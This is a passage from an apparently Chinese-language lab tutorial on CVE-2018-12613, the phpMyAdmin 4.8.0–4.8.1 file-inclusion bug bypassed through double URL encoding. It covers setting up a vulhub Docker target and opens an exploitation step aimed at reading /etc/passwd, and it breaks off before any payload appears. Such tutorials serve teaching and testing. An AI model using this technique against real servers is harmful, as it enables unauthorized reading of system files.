0x01 漏洞简介
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpMyAdmin 4.8.2 之前的 4.8.x 版本中,其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。
影响范围
- phpMyAdmin 4.8.0
- phpMyAdmin 4.8.1
0x02 漏洞环境
使用vulnhub快速搭建靶场
bash
cd /vulhub/phpmyadmin/CVE-2018-12613
sudo docker-compose up -d
环境启动后,访问http://your-ip:8080
,即可进入phpmyadmin。配置的是 config
模式,所以无需输入密码,直接登录test账户——如果报错可能是权限问题,将777改成755即可。
0x03 漏洞利用
1. 文件读取
读取 /etc/passwd
文件,payload如下:
bash
<